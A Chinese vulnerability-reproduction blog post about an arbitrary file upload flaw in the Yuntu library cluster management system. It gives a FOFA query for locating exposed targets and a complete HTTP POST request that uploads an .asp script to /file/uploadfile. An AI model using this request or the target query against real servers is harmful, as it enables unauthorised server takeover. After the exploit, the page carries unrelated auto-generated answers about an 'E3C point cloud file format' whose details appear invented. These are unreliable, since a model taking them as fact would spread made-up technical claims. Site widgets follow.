【漏洞复现】云图图书馆集群管理系统 uploadfile 存在任意文件上传漏洞

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

云图图书馆集成管理系统是一套基于aspx的图书馆里系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。

二、影响版本

云图图书馆集群管理系统

三、资产测绘

fofa:body=“Login/scanwxusr”

image-20240326230247394

四、漏洞复现

POST /file/uploadfile HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=00content0boundary00
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 176

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="vezvf.asp"
Content-Type: image/jpeg

<%Response.Write("test")%>
--00content0boundary00--

image-20240326225945315

image-20240326230143287

  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
### 回答1: E3C 点云图文件格式是一种用于存储和处理点云数据的文件格式。点云数据是指由大量离散点组成的三维空间数据,它广泛应用于计算机视觉、机器人、虚拟现实等领域。 E3C 点云图文件格式提供了一种标准的存储和交换点云数据的方式,使得不同的软件和设备可以方便地读取和处理这些数据。它采用了一种基于文本的格式,可以使用文本编辑器进行查看和编辑。 E3C 点云图文件格式将点云数据存储为一系列点的坐标和属性信息。每个点的坐标由三个浮点数表示,分别代表点在三维空间中的位置。此外,每个点还可以包含其他属性信息,如颜色、法线方向、强度等。 除了点的坐标和属性信息,E3C 点云图文件格式还包含了一些辅助信息,如点云的边界框、文件版本号等。这些信息有助于软件和设备在读取和处理点云数据时进行正确的解析和操作。 使用E3C 点云图文件格式,我们可以方便地将点云数据保存为文件,并在需要时进行读取和处理。该文件格式的开放性和通用性使得它成为点云数据存储和交换的常用标准,有助于促进不同软件和设备之间的互通性。 ### 回答2: E3C点云图文件格式是一种用于存储和表示点云数据的文件格式。点云是由大量的三维点组成的数据集,每个点都有自己的坐标和可能的其他属性信息。 E3C点云图文件格式采用二进制方式存储数据,以节省存储空间和提高读写效率。该格式包含了一系列的数据块,每个数据块包含了点云数据的不同部分。常见的数据块包括点坐标数据块、颜色数据块、法线数据块等。 点坐标数据块存储了点的三维坐标信息。每个点都有X、Y和Z坐标分量,以浮点数的形式存储。颜色数据块存储了点的颜色信息,一般用RGB三个分量表示。法线数据块存储了点的法线向量信息,用于描述点云表面的朝向。此外,还可以包含其他的属性信息,如点的强度、分类等。 E3C点云图文件格式还提供了索引和压缩功能。索引可以加速点的查找和访问,而压缩则可以减小文件的大小。压缩的方式可以采用无损压缩或有损压缩,根据用户的需求和应用场景选择合适的压缩算法。 使用E3C点云图文件格式可以有效地存储和传输大量的三维点云数据,方便点云数据的处理和分析。该格式在机器视觉、三维重建、自动驾驶等领域广泛应用,为各种点云相关的应用提供了便利。 ### 回答3: E3C点云图文件格式是一种用于存储和处理点云数据的文件格式。点云是由大量的3D点组成的,它们可以表示物体表面在三维空间中的形状和位置。 E3C点云图文件格式通常使用二进制形式存储数据,以便有效地表示大量的点。这种格式具有一定的压缩能力,可以减小文件的大小,并提高数据的传输和存储效率。 E3C点云图文件格式通常包括点的坐标信息、法线信息、颜色信息等。坐标信息描述了点在三维空间中的位置,法线信息描述了点在表面上的方向,而颜色信息描述了点的颜色。 E3C点云图文件格式还可以包含其他辅助信息,比如点的分类、标签、注释等。这些额外的信息可以帮助用户对点云数据进行更详细的分析和处理。 为了方便点云数据的使用,E3C点云图文件格式还定义了一些标准的读取和写入接口,以便软件程序能够直接读取和处理这种格式的数据。这使得点云数据在各种不同的应用领域中得到了广泛的应用,比如计算机视觉、虚拟现实、机器人技术等。 总的来说,E3C点云图文件格式是一种用于存储和处理点云数据的方便、高效的文件格式。它为点云数据的分析和应用提供了强大的支持,对于推动相关领域的发展具有重要的意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值